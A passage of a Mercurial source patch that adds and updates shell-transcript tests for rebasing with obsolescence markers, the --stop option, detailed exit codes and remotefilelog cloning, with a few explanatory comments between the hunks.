+ $ hg init p1-succ-in-dest
+ $ cd p1-succ-in-dest
+
+ $ hg debugdrawdag <<EOF
+ > F C
+ > /| |
+ > E D B # replace: D -> B
+ > \|/
+ > A
+ > EOF
+ 1 new orphan changesets
+
+ $ hg rebase -d C -s D
+ note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B"
+ rebasing 5:66f1a38021c9 F tip "F"
+
+ $ hg log -G
+ o 6:0913febf6439 F
+ |\
+ +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439)
+ | | |
+ | o | 4:26805aba1e60 C
+ | | |
+ o | | 3:7fb047a69f22 E
+ | | |
+ +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961)
+ | |
+ | o 1:112478962961 B
+ |/
+ o 0:426bada5c675 A
+
+ $ cd ..
+
+Rebase merge where successor of other parent is ancestor of destination
+
+ $ hg init p2-succ-in-dest
+ $ cd p2-succ-in-dest
+
+ $ hg debugdrawdag <<EOF
+ > F C
+ > /| |
+ > E D B # replace: E -> B
+ > \|/
+ > A
+ > EOF
+ 1 new orphan changesets
+
+ $ hg rebase -d C -s E
+ note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B"
+ rebasing 5:66f1a38021c9 F tip "F"
+ $ hg log -G
+ o 6:c6ab0cc6d220 F
+ |\
+ +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220)
+ | | |
+ | o | 4:26805aba1e60 C
+ | | |
+ | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961)
+ | | |
+ o---+ 2:b18e25de2cf5 D
+ / /
+ o / 1:112478962961 B
+ |/
+ o 0:426bada5c675 A
+
+ $ cd ..
+
+Rebase merge where successor of one parent is ancestor of destination
+
+ $ hg init p1-succ-in-dest-b
+ $ cd p1-succ-in-dest-b
+
+ $ hg debugdrawdag <<EOF
+ > F C
+ > /| |
+ > E D B # replace: E -> B
+ > \|/
+ > A
+ > EOF
+ 1 new orphan changesets
+
+ $ hg rebase -d C -b F
+ rebasing 2:b18e25de2cf5 D "D"
+ note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B"
+ rebasing 5:66f1a38021c9 F tip "F"
+ note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes
+ $ hg log -G
+ o 6:8f47515dda15 D
+ |
+ | x 5:66f1a38021c9 F (pruned using rebase)
+ | |\
+ o | | 4:26805aba1e60 C
+ | | |
+ | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961)
+ | | |
+ | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15)
+ | |/
+ o / 1:112478962961 B
+ |/
+ o 0:426bada5c675 A
+
+ $ cd ..
+
+Rebase merge where successor of other parent is ancestor of destination
+
+ $ hg init p2-succ-in-dest-b
+ $ cd p2-succ-in-dest-b
+
+ $ hg debugdrawdag <<EOF
+ > F C
+ > /| |
+ > E D B # replace: D -> B
+ > \|/
+ > A
+ > EOF
+ 1 new orphan changesets
+
+ $ hg rebase -d C -b F
+ note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B"
+ rebasing 3:7fb047a69f22 E "E"
+ rebasing 5:66f1a38021c9 F tip "F"
+ note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes
+
+ $ hg log -G
+ o 6:533690786a86 E
+ |
+ | x 5:66f1a38021c9 F (pruned using rebase)
+ | |\
+ o | | 4:26805aba1e60 C
+ | | |
+ | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86)
+ | | |
+ | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961)
+ | |/
+ o / 1:112478962961 B
+ |/
+ o 0:426bada5c675 A
+
+ $ cd ..
+
+Rebase merge where extinct node has successor that is not an ancestor of
+destination
+
+ $ hg init extinct-with-succ-not-in-dest
+ $ cd extinct-with-succ-not-in-dest
+
+ $ hg debugdrawdag <<EOF
+ > E C # replace: C -> E
+ > | |
+ > D B
+ > |/
+ > A
+ > EOF
+
+ $ hg rebase -d D -s B
+ rebasing 1:112478962961 B "B"
+ note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence
+
+ $ cd ..
+
+ $ hg init p2-succ-in-dest-c
+ $ cd p2-succ-in-dest-c
+
+The scenario here was that B::D were developed on default. B was queued on
+stable, but amended before being pushed to hg-committed. C was queued on
+default, along with unrelated J.
+
+ $ hg debugdrawdag <<EOF
+ > J
+ > |
+ > F
+ > |
+ > E
+ > | D
+ > | |
+ > | C # replace: C -> F
+ > | | H I # replace: B -> H -> I
+ > | B |/
+ > |/ G
+ > A
+ > EOF
+ 1 new orphan changesets
+
+This strip seems to be the key to avoiding an early divergence warning.
+ $ hg --config extensions.strip= --hidden strip -qr H
+ 1 new orphan changesets
+
+ $ hg rebase -b 'desc("D")' -d 'desc("J")'
+ abort: this rebase will cause divergences from: 112478962961
+ (to force the rebase please set experimental.evolution.allowdivergence=True)
+ [20]
+
+Rebase merge where both parents have successors in destination
+
+ $ hg init p12-succ-in-dest
+ $ cd p12-succ-in-dest
+ $ hg debugdrawdag <<'EOS'
+ > E F
+ > /| /| # replace: A -> C
+ > A B C D # replace: B -> D
+ > | |
+ > X Y
+ > EOS
+ 1 new orphan changesets
+ $ hg rebase -r A+B+E -d F
+ note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C"
+ note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D"
+ rebasing 7:dac5d11c5a7d E tip "E"
+ abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f
+ [10]
+ $ cd ..
+
+Rebase a non-clean merge. One parent has a successor in the destination; the
+other parent moves as requested.
+
+ $ hg init p1-succ-p2-move
+ $ cd p1-succ-p2-move
+ $ hg debugdrawdag <<'EOS'
+ > D Z
+ > /| | # replace: A -> C
+ > A B C # D/D = D
+ > EOS
+ 1 new orphan changesets
+ $ hg rebase -r A+B+D -d Z
+ note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C"
+ rebasing 1:fc2b737bb2e5 B "B"
+ rebasing 3:b8ed089c80ad D "D"
+
+ $ rm .hg/localtags
+ $ hg log -G
+ o 6:e4f78693cc88 D
+ |
+ o 5:76840d832e98 B
+ |
+ o 4:50e41c1f3950 Z
+ |
+ o 2:96cc3511f894 C
+
+ $ hg files -r tip
+ B
+ C
+ D
+ Z
+
+ $ cd ..
+
+ $ hg init p1-move-p2-succ
+ $ cd p1-move-p2-succ
+ $ hg debugdrawdag <<'EOS'
+ > D Z
+ > /| | # replace: B -> C
+ > A B C # D/D = D
+ > EOS
+ 1 new orphan changesets
+ $ hg rebase -r B+A+D -d Z
+ rebasing 0:426bada5c675 A "A"
+ note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C"
+ rebasing 3:b8ed089c80ad D "D"
+
+ $ rm .hg/localtags
+ $ hg log -G
+ o 6:1b355ed94d82 D
+ |
+ o 5:a81a74d764a6 A
+ |
+ o 4:50e41c1f3950 Z
+ |
+ o 2:96cc3511f894 C
+
+ $ hg files -r tip
+ A
+ C
+ D
+ Z
+
+ $ cd ..
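
Several of the cases above opt into divergence one command at a time with
"--config experimental.evolution.allowdivergence=True". A minimal sketch of
making that persistent instead (illustrative only; the transcripts keep it
per-command so the abort paths remain testable):

  $ cat >> $HGRCPATH << EOF
  > [experimental]
  > evolution.allowdivergence = True
  > EOF

With this set, rebasing an obsolete changeset whose successor survives
elsewhere proceeds and flags the results as content-divergent instead of
aborting.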
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-rebase-obsolete4.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,501 @@
+==========================
+Test rebase with obsolete
+==========================
+
+Enable obsolete
+
+ $ cat >> $HGRCPATH << EOF
+ > [command-templates]
+ > log= {rev}:{node|short} {desc|firstline}{if(obsolete,' ({obsfate})')}
+ > [experimental]
+ > evolution.createmarkers=True
+ > evolution.allowunstable=True
+ > [phases]
+ > publish=False
+ > [extensions]
+ > rebase=
+ > drawdag=$TESTDIR/drawdag.py
+ > strip=
+ > EOF
+
+Test that bookmark is moved and working dir is updated when all changesets have
+equivalents in destination
+ $ hg init rbsrepo && cd rbsrepo
+ $ echo "[experimental]" > .hg/hgrc
+ $ echo "evolution=true" >> .hg/hgrc
+ $ echo root > root && hg ci -Am root
+ adding root
+ $ echo a > a && hg ci -Am a
+ adding a
+ $ hg up 0
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo b > b && hg ci -Am b
+ adding b
+ created new head
+ $ hg rebase -r 2 -d 1
+ rebasing 2:1e9a3c00cbe9 tip "b"
+ $ hg log -r . # working dir is at rev 3 (successor of 2)
+ 3:be1832deae9a b (no-eol)
+ $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now
+ bookmarking hidden changeset 1e9a3c00cbe9
+ (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a)
+ $ hg up 2 && hg log -r . # working dir is at rev 2 again
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol)
+ $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1
+ note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b"
+Check that the working directory and bookmark were updated to rev 3 although
+rev 2 was skipped
+ $ hg log -r .
+ 3:be1832deae9a b (no-eol)
+ $ hg bookmarks
+ mybook 3:be1832deae9a
+ $ hg debugobsolete --rev tip
+ 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'}
+
+An obsoleted working parent and bookmark can be moved if an ancestor of the
+working parent gets moved:
+
+ $ hg init $TESTTMP/ancestor-wd-move
+ $ cd $TESTTMP/ancestor-wd-move
+ $ hg debugdrawdag <<'EOS'
+ > E D1 # rebase: D1 -> D2
+ > | |
+ > | C
+ > D2 |
+ > | B
+ > |/
+ > A
+ > EOS
+ $ hg update D1 -q
+ $ hg bookmark book -i
+ $ hg rebase -r B+D1 -d E
+ rebasing 1:112478962961 B "B"
+ note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2"
+ 1 new orphan changesets
+ $ hg log -G -T '{desc} {bookmarks}'
+ @ B book
+ |
+ | x D1
+ | |
+ o | E
+ | |
+ | * C
+ | |
+ o | D2
+ | |
+ | x B
+ |/
+ o A
+
+Rebasing a merge with one of its parents having a hidden successor
+
+ $ hg init $TESTTMP/merge-p1-hidden-successor
+ $ cd $TESTTMP/merge-p1-hidden-successor
+
+ $ hg debugdrawdag <<'EOS'
+ > E
+ > |
+ > B3 B2 # amend: B1 -> B2 -> B3
+ > |/ # B2 is hidden
+ > | D
+ > | |\
+ > | B1 C
+ > |/
+ > A
+ > EOS
+ 1 new orphan changesets
+
+ $ eval `hg tags -T '{tag}={node}\n'`
+ $ rm .hg/localtags
+
+ $ hg rebase -r $D -d $E
+ rebasing 5:9e62094e4d94 "D"
+
+ $ hg log -G
+ o 7:a699d059adcf D
+ |\
+ | o 6:ecc93090a95c E
+ | |
+ | o 4:0dc878468a23 B3
+ | |
+ o | 1:96cc3511f894 C
+ /
+ o 0:426bada5c675 A
+
+For various reasons (--hidden, directaccess, etc.),
+rebasestate may contain hidden hashes. "rebase --abort" should work regardless.
+
+ $ hg init $TESTTMP/hidden-state1
+ $ cd $TESTTMP/hidden-state1
+
+ $ hg debugdrawdag <<'EOS'
+ > C
+ > |
+ > D B # B/D=B
+ > |/
+ > A
+ > EOS
+
+ $ eval `hg tags -T '{tag}={node}\n'`
+ $ rm .hg/localtags
+
+ $ hg update -q $C
+ $ hg rebase -s $B -d $D
+ rebasing 1:2ec65233581b "B"
+ merging D
+ warning: conflicts while merging D! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+
+ $ hg debugobsolete $B
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ 1 new orphan changesets
+ $ hg debugobsolete $C
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ $ cp -R . $TESTTMP/hidden-state2
+
+ $ hg log -G
+ @ 2:b18e25de2cf5 D
+ |
+ | % 1:2ec65233581b B (pruned)
+ |/
+ o 0:426bada5c675 A
+
+ $ hg summary
+ parent: 2:b18e25de2cf5 tip
+ D
+ branch: default
+ commit: 1 modified, 1 added, 1 unknown, 1 unresolved
+ update: 1 new changesets, 2 branch heads (merge)
+ phases: 3 draft
+ rebase: 0 rebased, 2 remaining (rebase --continue)
+
+ $ hg rebase --abort
+ rebase aborted
+
+Also test --continue for the above case
+
+ $ cd $TESTTMP/hidden-state2
+ $ hg resolve -m
+ (no more unresolved files)
+ continue: hg rebase --continue
+ $ hg rebase --continue
+ note: not rebasing 1:2ec65233581b "B", it has no successor
+ note: not rebasing 3:7829726be4dc tip "C", it has no successor
+ $ hg log -G
+ @ 2:b18e25de2cf5 D
+ |
+ o 0:426bada5c675 A
+
+====================
+Test --stop option
+====================
+ $ cd ..
+ $ hg init rbstop
+ $ cd rbstop
+ $ echo a>a
+ $ hg ci -Aqma
+ $ echo b>b
+ $ hg ci -Aqmb
+ $ echo c>c
+ $ hg ci -Aqmc
+ $ echo d>d
+ $ hg ci -Aqmd
+ $ hg up 0 -q
+ $ echo f>f
+ $ hg ci -Aqmf
+ $ echo D>d
+ $ hg ci -Aqm "conflict with d"
+ $ hg up 3 -q
+ $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
+ o 5:00bfc9898aeb test
+ | conflict with d
+ |
+ o 4:dafd40200f93 test
+ | f
+ |
+ | @ 3:055a42cdd887 test
+ | | d
+ | |
+ | o 2:177f92b77385 test
+ | | c
+ | |
+ | o 1:d2ae7f538514 test
+ |/ b
+ |
+ o 0:cb9a9f314b8b test
+ a
+
+ $ hg rebase -s 1 -d 5
+ rebasing 1:d2ae7f538514 "b"
+ rebasing 2:177f92b77385 "c"
+ rebasing 3:055a42cdd887 "d"
+ merging d
+ warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg rebase --stop
+ 1 new orphan changesets
+ $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
+ o 7:7fffad344617 test
+ | c
+ |
+ o 6:b15528633407 test
+ | b
+ |
+ o 5:00bfc9898aeb test
+ | conflict with d
+ |
+ o 4:dafd40200f93 test
+ | f
+ |
+ | @ 3:055a42cdd887 test
+ | | d
+ | |
+ | x 2:177f92b77385 test
+ | | c
+ | |
+ | x 1:d2ae7f538514 test
+ |/ b
+ |
+ o 0:cb9a9f314b8b test
+ a
+
+Test it aborts if unstable csets are not allowed:
+===============================================
+ $ cat >> $HGRCPATH << EOF
+ > [experimental]
+ > evolution.allowunstable=False
+ > EOF
+
+ $ hg strip 6 --no-backup -q
+ $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
+ o 5:00bfc9898aeb test
+ | conflict with d
+ |
+ o 4:dafd40200f93 test
+ | f
+ |
+ | @ 3:055a42cdd887 test
+ | | d
+ | |
+ | o 2:177f92b77385 test
+ | | c
+ | |
+ | o 1:d2ae7f538514 test
+ |/ b
+ |
+ o 0:cb9a9f314b8b test
+ a
+
+ $ hg rebase -s 1 -d 5
+ rebasing 1:d2ae7f538514 "b"
+ rebasing 2:177f92b77385 "c"
+ rebasing 3:055a42cdd887 "d"
+ merging d
+ warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg rebase --stop
+ abort: cannot remove original changesets with unrebased descendants
+ (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets)
+ [20]
+ $ hg rebase --abort
+ saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg
+ rebase aborted
+
+Test --stop when --keep is passed:
+==================================
+ $ hg rebase -s 1 -d 5 --keep
+ rebasing 1:d2ae7f538514 "b"
+ rebasing 2:177f92b77385 "c"
+ rebasing 3:055a42cdd887 "d"
+ merging d
+ warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg rebase --stop
+ $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
+ o 7:7fffad344617 test
+ | c
+ |
+ o 6:b15528633407 test
+ | b
+ |
+ o 5:00bfc9898aeb test
+ | conflict with d
+ |
+ o 4:dafd40200f93 test
+ | f
+ |
+ | @ 3:055a42cdd887 test
+ | | d
+ | |
+ | o 2:177f92b77385 test
+ | | c
+ | |
+ | o 1:d2ae7f538514 test
+ |/ b
+ |
+ o 0:cb9a9f314b8b test
+ a
+
+Test --stop aborts when --collapse was passed:
+=============================================
+ $ cat >> $HGRCPATH << EOF
+ > [experimental]
+ > evolution.allowunstable=True
+ > EOF
+
+ $ hg strip 6
+ saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg
+ $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
+ o 5:00bfc9898aeb test
+ | conflict with d
+ |
+ o 4:dafd40200f93 test
+ | f
+ |
+ | @ 3:055a42cdd887 test
+ | | d
+ | |
+ | o 2:177f92b77385 test
+ | | c
+ | |
+ | o 1:d2ae7f538514 test
+ |/ b
+ |
+ o 0:cb9a9f314b8b test
+ a
+
+ $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d"
+ rebasing 1:d2ae7f538514 "b"
+ rebasing 2:177f92b77385 "c"
+ rebasing 3:055a42cdd887 "d"
+ merging d
+ warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg rebase --stop
+ abort: cannot stop in --collapse session
+ [20]
+ $ hg rebase --abort
+ rebase aborted
+ $ hg diff
+ $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
+ o 5:00bfc9898aeb test
+ | conflict with d
+ |
+ o 4:dafd40200f93 test
+ | f
+ |
+ | @ 3:055a42cdd887 test
+ | | d
+ | |
+ | o 2:177f92b77385 test
+ | | c
+ | |
+ | o 1:d2ae7f538514 test
+ |/ b
+ |
+ o 0:cb9a9f314b8b test
+ a
+
+Test --stop raises errors with conflicting options:
+=================================================
+ $ hg rebase -s 3 -d 5
+ rebasing 3:055a42cdd887 "d"
+ merging d
+ warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg rebase --stop --dry-run
+ abort: cannot specify both --stop and --dry-run
+ [10]
+
+ $ hg rebase -s 3 -d 5
+ abort: rebase in progress
+ (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop')
+ [20]
+ $ hg rebase --stop --continue
+ abort: cannot specify both --stop and --continue
+ [10]
+
+Test --stop moves bookmarks of original revisions to new rebased nodes:
+======================================================================
+ $ cd ..
+ $ hg init repo
+ $ cd repo
+
+ $ echo a > a
+ $ hg ci -Am A
+ adding a
+
+ $ echo b > b
+ $ hg ci -Am B
+ adding b
+ $ hg book X
+ $ hg book Y
+
+ $ echo c > c
+ $ hg ci -Am C
+ adding c
+ $ hg book Z
+
+ $ echo d > d
+ $ hg ci -Am D
+ adding d
+
+ $ hg up 0 -q
+ $ echo e > e
+ $ hg ci -Am E
+ adding e
+ created new head
+
+ $ echo doubt > d
+ $ hg ci -Am "conflict with d"
+ adding d
+
+ $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n"
+ @ 5: 39adf30bc1be 'conflict with d' bookmarks:
+ |
+ o 4: 9c1e55f411b6 'E' bookmarks:
+ |
+ | o 3: 67a385d4e6f2 'D' bookmarks: Z
+ | |
+ | o 2: 49cb3485fa0c 'C' bookmarks: Y
+ | |
+ | o 1: 6c81ed0049f8 'B' bookmarks: X
+ |/
+ o 0: 1994f17a630e 'A' bookmarks:
+
+ $ hg rebase -s 1 -d 5
+ rebasing 1:6c81ed0049f8 X "B"
+ rebasing 2:49cb3485fa0c Y "C"
+ rebasing 3:67a385d4e6f2 Z "D"
+ merging d
+ warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg rebase --stop
+ 1 new orphan changesets
+ $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n"
+ o 7: 9c86c650b686 'C' bookmarks: Y
+ |
+ o 6: 9b87b54e5fd8 'B' bookmarks: X
+ |
+ @ 5: 39adf30bc1be 'conflict with d' bookmarks:
+ |
+ o 4: 9c1e55f411b6 'E' bookmarks:
+ |
+ | * 3: 67a385d4e6f2 'D' bookmarks: Z
+ | |
+ | x 2: 49cb3485fa0c 'C' bookmarks:
+ | |
+ | x 1: 6c81ed0049f8 'B' bookmarks:
+ |/
+ o 0: 1994f17a630e 'A' bookmarks:
+
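
The test-rebase-parameters.t and test-rebase-scenario-global.t hunks below are
mostly about detailed exit codes: generic [255] aborts become [10] for bad
input (e.g. conflicting flags) or [20] for bad repository state (e.g. a rebase
already in progress), while [240] keeps marking unresolved merge conflicts.
The bracketed number in a transcript is the command's exit status, so the
distinction is observable from any shell; a sketch using one of the cases
below (the echoed line is illustrative, implied by the expected [10]):

  $ hg rebase --continue --collapse; echo "exit: $?"
  abort: cannot use collapse with continue or abort
  exit: 10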
--- a/tests/test-rebase-parameters.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-parameters.t Tue Apr 20 11:01:06 2021 -0400
@@ -66,7 +66,7 @@
$ hg rebase --continue --collapse
abort: cannot use collapse with continue or abort
- [255]
+ [10]
$ hg rebase --continue --dest 4
abort: cannot specify both --continue and --dest
@@ -94,15 +94,15 @@
$ hg rebase --rev 'wdir()' --dest 6
abort: cannot rebase the working copy
- [255]
+ [10]
$ hg rebase --source 'wdir()' --dest 6
abort: cannot rebase the working copy
- [255]
+ [10]
$ hg rebase --source 1 --source 'wdir()' --dest 6
abort: cannot rebase the working copy
- [255]
+ [10]
$ hg rebase --source '1 & !1' --dest 8
empty "source" revision set - nothing to rebase
@@ -508,11 +508,11 @@
$ hg rebase -i
abort: interactive history editing is supported by the 'histedit' extension (see "hg --config extensions.histedit= help -e histedit")
- [255]
+ [10]
$ hg rebase --interactive
abort: interactive history editing is supported by the 'histedit' extension (see "hg --config extensions.histedit= help -e histedit")
- [255]
+ [10]
$ cd ..
--- a/tests/test-rebase-scenario-global.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-rebase-scenario-global.t Tue Apr 20 11:01:06 2021 -0400
@@ -266,14 +266,14 @@
$ hg rebase -s 5 -d 6
abort: source and destination form a cycle
- [255]
+ [10]
G onto B - merge revision with both parents not in ancestors of target:
$ hg rebase -s 6 -d 1
rebasing 6:eea13746799a "G"
abort: cannot rebase 6:eea13746799a without moving at least one of its parents
- [255]
+ [10]
$ hg rebase --abort
rebase aborted
@@ -325,9 +325,8 @@
$ hg pull --config phases.publish=True -q -r 6 . # update phase of 6
$ hg rebase -d 0 -b 6
- abort: cannot rebase public changesets
- (see 'hg help phases' for details)
- [10]
+ nothing to rebase
+ [1]
$ hg rebase -d 5 -b 6
abort: cannot rebase public changesets
(see 'hg help phases' for details)
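
The remotefilelog hunks that follow use the test runner's conditional-output
syntax: a trailing "(feature !)" keeps an expected line only when the named
feature is available in the build under test, and "(glob)" allows "*"
wildcards. That is how one transcript covers both zlib and zstd builds, whose
streamed byte counts differ; the pattern, as it appears below:

  2 files to transfer, 776 bytes of data (no-zstd !)
  transferred 776 bytes in * seconds (*/sec) (glob) (no-zstd !)
  2 files to transfer, 784 bytes of data (zstd !)
  transferred 784 bytes in * seconds (* */sec) (glob) (zstd !)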
--- a/tests/test-remotefilelog-bgprefetch.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-bgprefetch.t Tue Apr 20 11:01:06 2021 -0400
@@ -29,8 +29,10 @@
$ hgcloneshallow ssh://user@dummy/master shallow --noupdate
streaming all changes
- 2 files to transfer, 776 bytes of data
- transferred 776 bytes in * seconds (*/sec) (glob)
+ 2 files to transfer, 776 bytes of data (no-zstd !)
+ transferred 776 bytes in * seconds (*/sec) (glob) (no-zstd !)
+ 2 files to transfer, 784 bytes of data (zstd !)
+ transferred 784 bytes in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
@@ -63,6 +65,7 @@
> EOF
$ hg strip tip
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/6b4b6f66ef8c-b4b8bdaf-backup.hg (glob)
+ 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
$ clearcache
$ hg pull
--- a/tests/test-remotefilelog-bundles.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-bundles.t Tue Apr 20 11:01:06 2021 -0400
@@ -26,12 +26,12 @@
$ hg strip -r 66ee28d0328c
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg (glob)
- 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob)
+ 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob)
$ hg unbundle .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg
adding changesets
adding manifests
adding file changes
- added 2 changesets with 0 changes to 0 files
+ added 2 changesets with 2 changes to 1 files
new changesets 66ee28d0328c:16db62c5946f
(run 'hg update' to get a working copy)
@@ -51,7 +51,7 @@
Pulling from a shallow bundle
- $ hg strip -r 66ee28d0328c
+ $ hg strip -r 66ee28d0328c --config remotefilelog.strip.includefiles=none
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg (glob)
$ hg pull -r 66ee28d0328c .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg
pulling from .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg
@@ -63,12 +63,13 @@
new changesets 66ee28d0328c (1 drafts)
(run 'hg update' to get a working copy)
-Pulling from a full bundle
+Pulling from a full bundle, also testing that strip produces a full bundle by
+default.
$ hg strip -r 66ee28d0328c
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg (glob)
- $ hg pull -r 66ee28d0328c ../fullbundle.hg
- pulling from ../fullbundle.hg
+ $ hg pull -r 66ee28d0328c .hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg
+ pulling from .hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg
searching for changes
abort: cannot pull from full bundles
(use `hg unbundle` instead)
--- a/tests/test-remotefilelog-clone-tree.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-clone-tree.t Tue Apr 20 11:01:06 2021 -0400
@@ -30,6 +30,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -71,6 +73,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -91,8 +95,7 @@
# flakiness here
$ hg clone --noupdate ssh://user@dummy/shallow full 2>/dev/null
streaming all changes
- remote: abort: Cannot clone from a shallow repo to a full repo.
- [255]
+ [100]
# getbundle full clone
@@ -113,6 +116,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-remotefilelog-clone.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-clone.t Tue Apr 20 11:01:06 2021 -0400
@@ -27,6 +27,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -61,6 +63,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -85,9 +89,9 @@
$ TEMP_STDERR=full-clone-from-shallow.stderr.tmp
$ hg clone --noupdate ssh://user@dummy/shallow full 2>$TEMP_STDERR
streaming all changes
+ [100]
+ $ cat $TEMP_STDERR
remote: abort: Cannot clone from a shallow repo to a full repo.
- [255]
- $ cat $TEMP_STDERR
abort: pull failed on remote
$ rm $TEMP_STDERR
@@ -110,6 +114,8 @@
exp-remotefilelog-repo-req-1
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-remotefilelog-local.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-remotefilelog-local.t Tue Apr 20 11:01:06 2021 -0400
@@ -116,7 +116,7 @@
$ hg strip -r .
2 files updated, 0 files merged, 1 files removed, 0 files unresolved
saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/19edf50f4de7-df3d0f74-backup.hg (glob)
